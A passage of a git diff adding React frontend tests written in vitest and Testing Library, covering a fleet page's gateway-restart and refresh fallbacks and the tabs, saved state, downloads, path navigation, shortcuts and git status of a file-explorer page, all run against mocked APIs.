+    Object.defineProperty(window.location, 'reload', { configurable: true, value: reloadSpy })
+    installFetch({ ...fleetOf(MAIN_ROW), gateway_service_active: true }, (u, opts) => {
+      if (u.includes('/restart-gateway') && isPost(opts)) return res({ ok: true })
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByLabelText('Restart gateway')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByLabelText('Restart gateway'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Restart' }))
+    // No start_id in the response -> legacy degrade: any answer means "back".
+    await waitFor(() => expect(reloadSpy).toHaveBeenCalled(), { timeout: 12000 })
+  }, 20000)
+
+  it('reports a refused restart in the persistent banner', async () => {
+    installFetch({ ...fleetOf(MAIN_ROW), gateway_service_active: true }, (u, opts) => {
+      if (u.includes('/restart-gateway') && isPost(opts)) return res({ ok: false, error: 'systemctl: unit not loaded' })
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByLabelText('Restart gateway')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByLabelText('Restart gateway'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Restart' }))
+    const banner = await waitFor(() => screen.getByTestId('gateway-restart-error'))
+    expect(banner).toHaveTextContent('systemctl: unit not loaded')
+    // Dismissing the banner is the user's job, so it must survive until then.
+    fireEvent.click(within(banner).getByRole('button'))
+    await waitFor(() => expect(screen.queryByTestId('gateway-restart-error')).toBeNull())
+  }, 15000)
+
+  it('names the failed operation when the restart POST cannot be sent', async () => {
+    installFetch({ ...fleetOf(MAIN_ROW), gateway_service_active: true }, (u, opts) => {
+      if (u.includes('/restart-gateway') && isPost(opts)) return Promise.reject(new Error('Failed to fetch'))
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByLabelText('Restart gateway')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByLabelText('Restart gateway'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Restart' }))
+    const banner = await waitFor(() => screen.getByTestId('gateway-restart-error'))
+    expect(banner).toHaveTextContent('Restart failed: Failed to fetch')
+  }, 15000)
+
+  it('does not bounce the gateway when the restart confirm is cancelled', async () => {
+    let posts = 0
+    installFetch({ ...fleetOf(MAIN_ROW), gateway_service_active: true }, (u, opts) => {
+      if (u.includes('/restart-gateway') && isPost(opts)) { posts++; return res({ ok: true }) }
+      return null
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByLabelText('Restart gateway')).toBeInTheDocument(), { timeout: 4000 })
+    fireEvent.click(screen.getByLabelText('Restart gateway'))
+    const dialog = await screen.findByRole('dialog')
+    fireEvent.click(within(dialog).getByRole('button', { name: 'Cancel' }))
+    await waitFor(() => expect(screen.queryByRole('dialog')).toBeNull())
+    expect(posts).toBe(0)
+  })
+})
+
+describe('DevFleetPage post-action refresh', () => {
+  beforeEach(() => { vi.restoreAllMocks() })
+
+  it('falls back to a plain invalidate when the forced rebuild returns no data', async () => {
+    const urls: string[] = []
+    installFetch(null, (u) => {
+      if (u.includes('/fleet')) {
+        urls.push(u)
+        // The forced rebuild answers with no payload at all.
+        return u.includes('fresh=1') ? res(null) : res(fleetOf(MAIN_ROW, readyRow()))
+      }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const before = urls.length
+    fireEvent.click(screen.getByLabelText('Refresh fleet'))
+    await waitFor(() => expect(urls.some((u) => u.includes('fresh=1'))).toBe(true))
+    // The empty forced answer must not become the rendered state: a plain
+    // refetch follows and the rows survive.
+    await waitFor(() => expect(urls.length).toBeGreaterThan(before + 1))
+    expect(screen.getByText('wt-a')).toBeInTheDocument()
+  })
+
+  it('falls back to a plain invalidate when the forced rebuild fails outright', async () => {
+    const urls: string[] = []
+    installFetch(null, (u) => {
+      if (u.includes('/fleet')) {
+        urls.push(u)
+        return u.includes('fresh=1')
+          ? Promise.reject(new Error('rebuild failed'))
+          : res(fleetOf(MAIN_ROW, readyRow()))
+      }
+      return null
+    })
+    renderPage()
+    await waitForRow('wt-a')
+    const before = urls.length
+    fireEvent.click(screen.getByLabelText('Refresh fleet'))
+    await waitFor(() => expect(urls.some((u) => u.includes('fresh=1'))).toBe(true))
+    await waitFor(() => expect(urls.length).toBeGreaterThan(before + 1))
+    expect(screen.getByText('wt-a')).toBeInTheDocument()
+  })
+})

--- a/website/src/test/FileExplorerPageCoverage.test.tsx
+++ b/website/src/test/FileExplorerPageCoverage.test.tsx
@@ -1,0 +1,736 @@
+/**
+ * Coverage tests for the file-explorer page container.
+ *
+ * `fileExplorerComponents.test.tsx` already covers initialization (root
+ * selection from `health`) and the presentational children. This file drives
+ * the container's *interaction* surface, which that file leaves cold: tab
+ * open/close/activate/rename, saved-state restore and persistence, root
+ * navigation, the resolve mutation's four outcomes, download/reload, the
+ * keyboard shortcuts, the git-status derivation, and the pane resizer.
+ *
+ * Same harness as that file: mock the api client and the context-menu
+ * primitive, wrap in Redux + QueryClient + MemoryRouter, drive real events.
+ */
+import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'
+
+vi.mock('@radix-ui/react-context-menu', async () => await import('./__mocks__/@radix-ui/react-context-menu'))
+import { render, screen, waitFor, fireEvent, within, act } from '@testing-library/react'
+import userEvent from '@testing-library/user-event'
+import { MemoryRouter } from 'react-router-dom'
+import { QueryClient, QueryClientProvider } from '@tanstack/react-query'
+import { Provider } from 'react-redux'
+import { createTestStore } from './helpers'
+
+// TabStrip observes its scroller for scroll-fade detection.
+globalThis.ResizeObserver = class {
+  observe() {}
+  unobserve() {}
+  disconnect() {}
+} as unknown as typeof ResizeObserver
+
+vi.mock('../apps/file-explorer/api', () => ({
+  fileExplorerApi: {
+    health: vi.fn(),
+    tree: vi.fn(),
+    read: vi.fn(),
+    search: vi.fn(),
+    gitStatus: vi.fn(),
+    resolve: vi.fn(),
+    complete: vi.fn(),
+  },
+}))
+
+// MarkdownRenderer transitively loads highlight.js + mermaid; FileViewer also
+// consumes its BasePathCtx for markdown, so the stub must export both.
+vi.mock('../components/MarkdownRenderer', async () => {
+  const React = await import('react')
+  return {
+    default: ({ content }: { content: string }) =>
+      React.createElement('pre', { 'data-testid': 'md-renderer' }, content),
+    BasePathCtx: React.createContext(''),
+  }
+})
+
+vi.mock('../utils/clipboard', () => ({ copyToClipboard: vi.fn() }))
+
+import { fileExplorerApi } from '../apps/file-explorer/api'
+import { copyToClipboard } from '../utils/clipboard'
+import { STORAGE_KEY } from '../apps/file-explorer/constants'
+import FileExplorerPage from '../apps/file-explorer/FileExplorerPage'
+import type { TreeEntry, FileMeta, GitInfo } from '../apps/file-explorer/types'
+
+const ROOT = '/home/user'
+
+const ENTRIES: TreeEntry[] = [
+  { name: 'src', path: '/home/user/src', type: 'dir', children: [
+    { name: 'index.ts', path: '/home/user/src/index.ts', type: 'file' },
+  ] },
+  { name: 'notes.txt', path: '/home/user/notes.txt', type: 'file', size: 12, mtime: 1700000000 },
+  { name: 'other.txt', path: '/home/user/other.txt', type: 'file', size: 20, mtime: 1700000000 },
+]
+
+const base = (p: string): FileMeta => ({
+  size: 12, mtime: 1700000000, mime: 'text/plain', encoding: 'utf-8',
+  content: `body of ${p}`,
+})
+
+/** Give every endpoint a safe resolved value so no query can reject unhandled. */
+function stubApi() {
+  vi.mocked(fileExplorerApi.health).mockResolvedValue({ allowedRoots: [ROOT], home: ROOT })
+  vi.mocked(fileExplorerApi.tree).mockResolvedValue({ entries: ENTRIES })
+  vi.mocked(fileExplorerApi.read).mockImplementation((p: string) => Promise.resolve(base(p)))
+  vi.mocked(fileExplorerApi.search).mockResolvedValue({ results: [], engine: 'rg', truncated: false })
+  vi.mocked(fileExplorerApi.gitStatus).mockResolvedValue(null)
+  vi.mocked(fileExplorerApi.resolve).mockResolvedValue({ exists: true, type: 'dir' })
+  vi.mocked(fileExplorerApi.complete).mockResolvedValue({ entries: [] })
+}
+
+function renderPage() {
+  const qc = new QueryClient({ defaultOptions: { queries: { retry: false, gcTime: 0 } } })
+  const store = createTestStore()
+  const utils = render(
+    <Provider store={store}>
+      <QueryClientProvider client={qc}>
+        <MemoryRouter initialEntries={['/file-explorer']}>
+          <FileExplorerPage />
+        </MemoryRouter>
+      </QueryClientProvider>
+    </Provider>,
+  )
+  return { ...utils, store, qc }
+}
+
+/** Seed the persisted-state key the page restores from on mount. */
+function seedSaved(state: Record<string, unknown>) {
+  localStorage.setItem(STORAGE_KEY, JSON.stringify(state))
+}
+
+const treeBox = () => within(document.querySelector('.mc-fe-tree') as HTMLElement)
+const tabBox = () => within(document.querySelector('.mc-fe-tabs') as HTMLElement)
+const viewerName = () => document.querySelector('.mc-fe-viewer-filename')?.textContent
+const leftPx = () => (document.querySelector('.mc-fe-left') as HTMLElement).style.width
+
+/** The context-menu mock restores focus on a double rAF after a select. */
+const flushRaf = () =>
+  act(async () => {
+    await new Promise<void>((r) => requestAnimationFrame(() => requestAnimationFrame(() => r())))
+  })
+
+async function ready() {
+  await waitFor(() => expect(document.querySelector('.mc-fe-tree')).toBeInTheDocument())
+}
+
+/** Open `name` from the tree and wait for the viewer to show it. */
+async function openFromTree(name: string) {
+  await userEvent.click(treeBox().getByText(name))
+  await waitFor(() => expect(viewerName()).toBe(name))
+}
+
+async function openMenuOn(name: string) {
+  fireEvent.contextMenu(treeBox().getByText(name))
+  await waitFor(() => expect(screen.getAllByRole('menuitem').length).toBeGreaterThan(0))
+}
+
+async function clickMenuItem(label: string) {
+  const item = screen.getAllByRole('menuitem').find((r) => r.textContent?.includes(label))
+  expect(item).toBeTruthy()
+  fireEvent.click(item as HTMLElement)
+  await flushRaf()
+}
+
+beforeEach(() => {
+  vi.clearAllMocks()
+  localStorage.clear()
+  stubApi()
+})
+
+afterEach(() => {
+  document.body.style.cursor = ''
+})
+
+// ─── saved state ────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage saved state', () => {
+  it('restores folder tabs, file tabs, active ids and pane width', async () => {
+    seedSaved({
+      folderTabs: [{ id: 'ft-a', rootPath: ROOT, label: 'Work', expanded: { [ROOT]: true } }],
+      fileTabs: [{ id: 'of-a', path: '/home/user/notes.txt', folderId: 'ft-a' }],
+      activeFolderId: 'ft-a',
+      activeFileId: 'of-a',
+      leftWidth: 320,
+    })
+    renderPage()
+    await ready()
+    // The saved label wins over the root's basename, and the saved file tab is
+    // restored as the active file rather than an empty viewer.
+    expect(tabBox().getByText('Work')).toBeInTheDocument()
+    expect(tabBox().getByText('notes.txt')).toBeInTheDocument()
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+    expect(leftPx()).toBe('320px')
+  })
+
+  it('falls back to the first tab and the default width when the save omits them', async () => {
+    seedSaved({ folderTabs: [{ id: 'ft-b', rootPath: ROOT, label: '' }] })
+    renderPage()
+    await ready()
+    // No label → basename; no fileTabs/leftWidth keys → viewer empty, width 280.
+    expect(tabBox().getByText('user')).toBeInTheDocument()
+    expect(leftPx()).toBe('280px')
+    expect(screen.getByText('Select a file to view')).toBeInTheDocument()
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith(ROOT, 2))
+  })
+
+  it('persists the live tab state after the debounce window', async () => {
+    renderPage()
+    await ready()
+    await waitFor(() => expect(localStorage.getItem(STORAGE_KEY)).toBeTruthy(), { timeout: 3000 })
+    const saved = JSON.parse(localStorage.getItem(STORAGE_KEY) as string)
+    expect(saved.folderTabs).toHaveLength(1)
+    expect(saved.folderTabs[0].rootPath).toBe(ROOT)
+    expect(saved.fileTabs).toEqual([])
+    expect(saved.leftWidth).toBe(280)
+  })
+
+  it('persists open file tabs so a reload restores them', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await waitFor(() => {
+      const s = JSON.parse(localStorage.getItem(STORAGE_KEY) ?? '{}')
+      expect(s.fileTabs).toHaveLength(1)
+    }, { timeout: 3000 })
+    const saved = JSON.parse(localStorage.getItem(STORAGE_KEY) as string)
+    expect(saved.fileTabs[0].path).toBe('/home/user/notes.txt')
+    expect(saved.fileTabs[0].folderId).toBe(saved.folderTabs[0].id)
+    expect(saved.activeFileId).toBe(saved.fileTabs[0].id)
+  })
+})
+
+// ─── file tabs ──────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage file tabs', () => {
+  it('opens a file tab when a tree file is clicked', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    expect(tabBox().getByText('notes.txt')).toBeInTheDocument()
+    expect(fileExplorerApi.read).toHaveBeenCalledWith('/home/user/notes.txt')
+    expect(screen.getByTestId('md-renderer').textContent).toContain('body of /home/user/notes.txt')
+  })
+
+  it('reuses the existing tab when the same file is clicked twice', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await userEvent.click(treeBox().getByText('notes.txt'))
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+    // Second click takes the `existing` path: re-activate, no duplicate tab.
+    expect(tabBox().getAllByText('notes.txt')).toHaveLength(1)
+  })
+
+  it('closing the active file tab activates the last remaining one', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await openFromTree('other.txt')
+    const closers = screen.getAllByLabelText('Close file tab')
+    expect(closers).toHaveLength(2)
+    await userEvent.click(closers[1])
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+    expect(screen.getAllByLabelText('Close file tab')).toHaveLength(1)
+  })
+
+  it('closing a non-active file tab keeps the current selection', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await openFromTree('other.txt')
+    await userEvent.click(screen.getAllByLabelText('Close file tab')[0])
+    await waitFor(() => expect(screen.getAllByLabelText('Close file tab')).toHaveLength(1))
+    expect(viewerName()).toBe('other.txt')
+  })
+
+  it('activates a file tab from the tab strip', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await openFromTree('other.txt')
+    await userEvent.click(tabBox().getByText('notes.txt'))
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+  })
+
+  it('reload re-fetches the open file', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    const before = vi.mocked(fileExplorerApi.read).mock.calls.length
+    await userEvent.click(screen.getByLabelText('Reload'))
+    await waitFor(() =>
+      expect(vi.mocked(fileExplorerApi.read).mock.calls.length).toBeGreaterThan(before),
+    )
+  })
+})
+
+// ─── download ───────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage download', () => {
+  /** Capture the synthesized <a> and the blob handed to createObjectURL. */
+  function captureDownload() {
+    const blobs: Blob[] = []
+    const names: string[] = []
+    const origCreate = URL.createObjectURL
+    const origRevoke = URL.revokeObjectURL
+    URL.createObjectURL = vi.fn((b: Blob) => { blobs.push(b); return 'blob:fe' }) as typeof URL.createObjectURL
+    URL.revokeObjectURL = vi.fn() as typeof URL.revokeObjectURL
+    const clickSpy = vi
+      .spyOn(HTMLAnchorElement.prototype, 'click')
+      .mockImplementation(function mockClick(this: HTMLAnchorElement) { names.push(this.download) })
+    return {
+      blobs, names,
+      restore: () => {
+        clickSpy.mockRestore()
+        URL.createObjectURL = origCreate
+        URL.revokeObjectURL = origRevoke
+      },
+    }
+  }
+
+  it('downloads a text file as a plain-text blob named after the file', async () => {
+    const cap = captureDownload()
+    try {
+      renderPage()
+      await ready()
+      await openFromTree('notes.txt')
+      await userEvent.click(screen.getByLabelText('Download'))
+      expect(cap.names).toEqual(['notes.txt'])
+      expect(cap.blobs).toHaveLength(1)
+      expect(cap.blobs[0].type).toBe('text/plain;charset=utf-8')
+      expect(URL.revokeObjectURL).toHaveBeenCalledWith('blob:fe')
+    } finally { cap.restore() }
+  })
+
+  it('decodes a base64 payload into a binary blob of the reported mime', async () => {
+    const cap = captureDownload()
+    try {
+      vi.mocked(fileExplorerApi.tree).mockResolvedValue({
+        entries: [{ name: 'shot.png', path: '/home/user/shot.png', type: 'file', size: 3 }],
+      })
+      vi.mocked(fileExplorerApi.read).mockResolvedValue({
+        size: 3, mime: 'image/png', encoding: 'base64', content: btoa('PNG'),
+      })
+      renderPage()
+      await ready()
+      await openFromTree('shot.png')
+      await userEvent.click(screen.getByLabelText('Download'))
+      expect(cap.names).toEqual(['shot.png'])
+      // atob branch: bytes, not the base64 text, and the backend's mime.
+      expect(cap.blobs[0].type).toBe('image/png')
+      expect(cap.blobs[0].size).toBe(3)
+    } finally { cap.restore() }
+  })
+})
+
+// ─── folder tabs ────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage folder tabs', () => {
+  it('adds a workspace tab rooted at the current path', async () => {
+    renderPage()
+    await ready()
+    await userEvent.click(screen.getByLabelText('New workspace tab'))
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(2))
+  })
+
+  it('closing the active folder tab activates the remaining one', async () => {
+    renderPage()
+    await ready()
+    await userEvent.click(screen.getByLabelText('New workspace tab'))
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(2))
+    // The second tab is active after creation; closing it falls back to the first.
+    await userEvent.click(screen.getAllByLabelText('Close workspace tab')[1])
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(1))
+    expect(document.querySelector('.mc-fe-tab-folder.is-active')).toBeInTheDocument()
+  })
+
+  it('closing a non-active folder tab keeps the active one selected', async () => {
+    renderPage()
+    await ready()
+    await userEvent.click(screen.getByLabelText('New workspace tab'))
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(2))
+    const activeBefore = document.querySelectorAll('.mc-fe-tab-folder')[1]
+    await userEvent.click(screen.getAllByLabelText('Close workspace tab')[0])
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(1))
+    expect(document.querySelector('.mc-fe-tab-folder')).toBe(activeBefore)
+    expect(document.querySelector('.mc-fe-tab-folder')).toHaveClass('is-active')
+  })
+
+  it('closing the last folder tab replaces it with a fresh root tab', async () => {
+    renderPage()
+    await ready()
+    await userEvent.click(screen.getByLabelText('Close workspace tab'))
+    // No tabs would leave nothing to render, so the page substitutes '/'.
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/', 2))
+    expect(document.querySelectorAll('.mc-fe-tab-folder')).toHaveLength(1)
+  })
+
+  it('closing a folder tab discards the file tabs that belonged to it', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    expect(screen.getAllByLabelText('Close file tab')).toHaveLength(1)
+    await userEvent.click(screen.getByLabelText('Close workspace tab'))
+    await waitFor(() => expect(screen.queryByLabelText('Close file tab')).not.toBeInTheDocument())
+    expect(screen.getByText('Select a file to view')).toBeInTheDocument()
+  })
+
+  it('activating a folder tab clears the file selection', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await userEvent.click(document.querySelector('.mc-fe-tab-folder') as HTMLElement)
+    // The file tab survives; only the viewer selection is dropped.
+    await waitFor(() => expect(screen.getByText('Select a file to view')).toBeInTheDocument())
+    expect(screen.getAllByLabelText('Close file tab')).toHaveLength(1)
+  })
+
+  it('renames a folder tab from a double-click', async () => {
+    renderPage()
+    await ready()
+    fireEvent.doubleClick(document.querySelector('.mc-fe-tab-folder') as HTMLElement)
+    const input = screen.getByLabelText('Rename workspace tab')
+    await userEvent.clear(input)
+    await userEvent.type(input, '  Scratch  {Enter}')
+    // The label is trimmed and replaces the basename.
+    await waitFor(() => expect(tabBox().getByText('Scratch')).toBeInTheDocument())
+    expect(tabBox().queryByText('user')).not.toBeInTheDocument()
+  })
+})
+
+// ─── tree + root navigation ─────────────────────────────────────────────────
+
+describe('FileExplorerPage tree and root navigation', () => {
+  it('toggles a directory open and closed', async () => {
+    renderPage()
+    await ready()
+    expect(treeBox().queryByText('index.ts')).not.toBeInTheDocument()
+    await userEvent.click(treeBox().getByText('src'))
+    await waitFor(() => expect(treeBox().getByText('index.ts')).toBeInTheDocument())
+    await userEvent.click(treeBox().getByText('src'))
+    await waitFor(() => expect(treeBox().queryByText('index.ts')).not.toBeInTheDocument())
+  })
+
+  it('a breadcrumb click re-roots the workspace and drops its file tabs', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    await userEvent.click(within(document.querySelector('.mc-fe-breadcrumbs') as HTMLElement).getByText('home'))
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home', 2))
+    expect(screen.queryByLabelText('Close file tab')).not.toBeInTheDocument()
+  })
+
+  it('re-rooting to the path already open is a no-op', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    const calls = vi.mocked(fileExplorerApi.tree).mock.calls.length
+    // The last breadcrumb segment IS the current root.
+    await userEvent.click(within(document.querySelector('.mc-fe-breadcrumbs') as HTMLElement).getByText('user'))
+    expect(vi.mocked(fileExplorerApi.tree).mock.calls.length).toBe(calls)
+    // A real re-root would have cleared the file tab; it is still here.
+    expect(screen.getAllByLabelText('Close file tab')).toHaveLength(1)
+  })
+
+  it('context menu "Open" opens the right-clicked file', async () => {
+    renderPage()
+    await ready()
+    await openMenuOn('notes.txt')
+    await clickMenuItem('Open')
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+  })
+
+  it('context menu "Open as workspace root" re-roots to the directory', async () => {
+    renderPage()
+    await ready()
+    await openMenuOn('src')
+    await clickMenuItem('Open as workspace root')
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/src', 2))
+  })
+
+  it('context menu "Reveal parent" re-roots to the parent directory', async () => {
+    renderPage()
+    await ready()
+    // Reveal must target a NESTED file: the parent of a root-level file is the
+    // root already, which re-rooting short-circuits.
+    await userEvent.click(treeBox().getByText('src'))
+    await waitFor(() => expect(treeBox().getByText('index.ts')).toBeInTheDocument())
+    await openMenuOn('index.ts')
+    await clickMenuItem('Reveal parent')
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/src', 2))
+  })
+
+  it('revealing the parent of a root-level file changes nothing', async () => {
+    renderPage()
+    await ready()
+    const calls = vi.mocked(fileExplorerApi.tree).mock.calls.length
+    await openMenuOn('notes.txt')
+    await clickMenuItem('Reveal parent')
+    expect(vi.mocked(fileExplorerApi.tree).mock.calls.length).toBe(calls)
+  })
+
+  it('context menu "Copy path" copies the node path', async () => {
+    renderPage()
+    await ready()
+    await openMenuOn('notes.txt')
+    await clickMenuItem('Copy path')
+    expect(copyToClipboard).toHaveBeenCalledWith('/home/user/notes.txt')
+  })
+
+  it('offers folder wording and no "Open" row for a directory', async () => {
+    renderPage()
+    await ready()
+    await openMenuOn('src')
+    const labels = screen.getAllByRole('menuitem').map((r) => r.textContent)
+    expect(labels.some((l) => l?.includes('Chat about this folder'))).toBe(true)
+    expect(labels.some((l) => l?.trim() === 'Open')).toBe(false)
+  })
+})
+
+// ─── path resolve ───────────────────────────────────────────────────────────
+
+describe('FileExplorerPage path resolution', () => {
+  /** Type a path into the path bar and commit it, which runs the resolve mutation. */
+  async function navigateTo(path: string) {
+    await userEvent.click(screen.getByTitle('Click to edit path'))
+    const input = screen.getByLabelText('Folder path')
+    await userEvent.clear(input)
+    await userEvent.type(input, `${path}{Enter}`)
+  }
+
+  it('re-roots when the path resolves to a directory', async () => {
+    renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.resolve).mockResolvedValue({ exists: true, type: 'dir' })
+    await navigateTo('/home/user/src')
+    await waitFor(() => expect(fileExplorerApi.resolve).toHaveBeenCalledWith('/home/user/src'))
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/src', 2))
+  })
+
+  it('re-roots to the parent and opens the file when the path is a file', async () => {
+    renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.resolve).mockResolvedValue({ exists: true, type: 'file' })
+    await navigateTo('/home/user/src/index.ts')
+    // Parent becomes the root, and the file itself is opened in a tab.
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/src', 2))
+    await waitFor(() => expect(viewerName()).toBe('index.ts'))
+  })
+
+  it('keeps the file in place when it already sits in the open root', async () => {
+    renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.resolve).mockResolvedValue({ exists: true, type: 'file' })
+    const calls = vi.mocked(fileExplorerApi.tree).mock.calls.length
+    await navigateTo('/home/user/notes.txt')
+    await waitFor(() => expect(viewerName()).toBe('notes.txt'))
+    // Parent === current root, so no re-root and no extra tree fetch.
+    expect(vi.mocked(fileExplorerApi.tree).mock.calls.length).toBe(calls)
+  })
+
+  it('still re-roots when the path does not exist', async () => {
+    renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.resolve).mockResolvedValue({ exists: false, type: '' })
+    await navigateTo('/home/user/ghost')
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/ghost', 2))
+  })
+
+  it('still re-roots when the resolve request fails', async () => {
+    renderPage()
+    await ready()
+    vi.mocked(fileExplorerApi.resolve).mockRejectedValue(new Error('offline'))
+    await navigateTo('/home/user/src')
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/home/user/src', 2))
+  })
+})
+
+// ─── search and keyboard shortcuts ──────────────────────────────────────────
+
+describe('FileExplorerPage shortcuts and search', () => {
+  const chord = (key: string) => fireEvent.keyDown(window, { key, ctrlKey: true })
+
+  it('toggles search with the command chord and closes it with Escape', async () => {
+    renderPage()
+    await ready()
+    act(() => { chord('f') })
+    await waitFor(() => expect(screen.getByPlaceholderText(/Search in/)).toBeInTheDocument())
+    act(() => { fireEvent.keyDown(window, { key: 'Escape' }) })
+    await waitFor(() => expect(screen.queryByPlaceholderText(/Search in/)).not.toBeInTheDocument())
+  })
+
+  it('ignores Escape when search is already closed', async () => {
+    renderPage()
+    await ready()
+    act(() => { fireEvent.keyDown(window, { key: 'Escape' }) })
+    expect(screen.queryByPlaceholderText(/Search in/)).not.toBeInTheDocument()
+    expect(screen.getByText('Select a file to view')).toBeInTheDocument()
+  })
+
+  it('opens a new workspace tab from the command chord', async () => {
+    renderPage()
+    await ready()
+    act(() => { chord('t') })
+    await waitFor(() => expect(tabBox().getAllByText('user')).toHaveLength(2))
+  })
+
+  it('closes the open file with the command chord', async () => {
+    renderPage()
+    await ready()
+    await openFromTree('notes.txt')
+    act(() => { chord('w') })
+    await waitFor(() => expect(screen.queryByLabelText('Close file tab')).not.toBeInTheDocument())
+  })
+
+  it('closes the workspace tab with the command chord when no file is open', async () => {
+    renderPage()
+    await ready()
+    act(() => { chord('w') })
+    // Last tab closed → substituted with a '/' root.
+    await waitFor(() => expect(fileExplorerApi.tree).toHaveBeenCalledWith('/', 2))
+  })
+
+  it('leaves unmodified keys alone', async () => {
+    renderPage()
+    await ready()
+    act(() => { fireEvent.keyDown(window, { key: 'f' }) })
+    expect(screen.queryByPlaceholderText(/Search in/)).not.toBeInTheDocument()
+  })
+
+  it('jumping to a search hit opens the file and closes the panel', async () => {
+    vi.mocked(fileExplorerApi.search).mockResolvedValue({
+      results: [{ file: '/home/user/other.txt', line: 3, col: 1, preview: 'needle here' }],
+      engine: 'rg', truncated: false,
+    })
+    renderPage()
+    await ready()
+    act(() => { chord('f') })
+    await userEvent.type(screen.getByPlaceholderText(/Search in/), 'needle')
+    await waitFor(() => expect(screen.getByText('needle here')).toBeInTheDocument())
+    await userEvent.click(screen.getByText('needle here'))
+    // Panel closes and the hit is opened in the viewer.
+    await waitFor(() => expect(screen.queryByPlaceholderText(/Search in/)).not.toBeInTheDocument())
+    expect(viewerName()).toBe('other.txt')
+  })
+})
+
+// ─── git status ─────────────────────────────────────────────────────────────
+
+describe('FileExplorerPage git status', () => {
+  it('shows the branch and change count for the open root', async () => {
+    vi.mocked(fileExplorerApi.gitStatus).mockResolvedValue({
+      repoRoot: ROOT, branch: 'feat/tabs', statuses: { 'notes.txt': 'M', 'other.txt': '??' },
+    })
+    renderPage()
+    await ready()
+    await waitFor(() => expect(screen.getByText('feat/tabs')).toBeInTheDocument())
+    expect(screen.getByText('2')).toBeInTheDocument()
+  })
+
+  it('queries git status for nested repos discovered in the tree', async () => {
+    vi.mocked(fileExplorerApi.tree).mockResolvedValue({
+      entries: [
+        { name: 'vendor', path: '/home/user/vendor', type: 'dir', children: [
+          { name: 'lib', path: '/home/user/vendor/lib', type: 'dir', isGitRoot: true, children: [] },
+        ] },
+        { name: 'app', path: '/home/user/app', type: 'dir', isGitRoot: true, children: [] },
+      ],
+    })
+    const byPath: Record<string, GitInfo> = {
+      '/home/user/app': { repoRoot: '/home/user/app', branch: 'app-main', statuses: {} },
+      '/home/user/vendor/lib': { repoRoot: '/home/user/vendor/lib', branch: 'lib-main', statuses: {} },
+    }
+    vi.mocked(fileExplorerApi.gitStatus).mockImplementation((p: string) =>
+      Promise.resolve(byPath[p] ?? null))
+    renderPage()
+    await ready()
+    // The walk recurses into children, so BOTH nested roots get a query.
+    await waitFor(() => expect(fileExplorerApi.gitStatus).toHaveBeenCalledWith('/home/user/app'))
+    await waitFor(() => expect(fileExplorerApi.gitStatus).toHaveBeenCalledWith('/home/user/vendor/lib'))
+  })
+
+  it('falls back to the enclosing repo when the open folder is not itself a root', async () => {
+    const sub = '/home/user/project/sub'
+    seedSaved({ folderTabs: [{ id: 'ft-s', rootPath: sub, label: '', expanded: { [sub]: true } }] })
+    vi.mocked(fileExplorerApi.tree).mockResolvedValue({ entries: [] })
+    // The backend reports the ancestor repo, which is not the open path.
+    vi.mocked(fileExplorerApi.gitStatus).mockResolvedValue({
+      repoRoot: '/home/user', branch: 'enclosing', statuses: { 'project/sub/a.txt': 'M' },
+    })
+    renderPage()
+    await waitFor(() => expect(screen.getByText('enclosing')).toBeInTheDocument())
+  })
+
